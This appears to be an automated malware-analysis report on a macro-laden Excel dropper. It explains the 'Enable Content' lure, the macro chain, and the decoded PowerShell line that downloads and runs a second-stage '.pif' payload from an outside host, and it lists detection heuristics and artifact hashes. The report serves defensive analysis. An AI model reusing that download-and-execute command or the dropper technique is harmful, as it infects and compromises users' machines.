Malware Insights
The sample is an XLSM file containing VBA macros. It uses a social engineering lure, instructing the user to 'Enable Content' to view a fake tour. Upon enabling, the Workbook_Activate subroutine is triggered, which calls Prefix0. Prefix0 constructs a batch file named 'Fkulgcinznhmce.bat' containing a PowerShell command. This command downloads a file from 'http://subhost.online/fold/extramile.pif' and saves it to a location determined by environment variables, then executes it. The PowerShell command is Base64 encoded and decodes to: 'New-Object System.Net.WebClient).DownloadFile("http://subhost.online/fold/extramile.pif", "$env:APPDADWA\ProcName") ; Start-Process ("$env:APPDADWA\ProcName")'. This indicates the macro's intent is to download and execute a second-stage payload.
Heuristics 5
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
VBA project inside OOXML medium OOXML_VBADocument contains vbaProject.bin — VBA macros present
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
External hyperlinks (3) low OOXML_EXTERNAL_HYPERLINKSDocument contains 3 external hyperlinks — clickable URLs are stored as external relationships. First target: http://go.microsoft.com/fwlink/?LinkId=846285
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://go.microsoft.com/fwlink/?LinkId=846285
- http://go.microsoft.com/fwlink/?LinkId=844969
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas3ee8b979cce80d4ba075d5e4c5127ee60d43ca6ae2e2ed307de265078c8b8b51 |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2645 bytes |
vbaProject_00.bine741518ab8f1eec9a7f41c7d20225281d6e901f64e185415e94444a7eb9b132f |
vba-project | OOXML VBA project: xl/vbaProject.bin | 6656 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.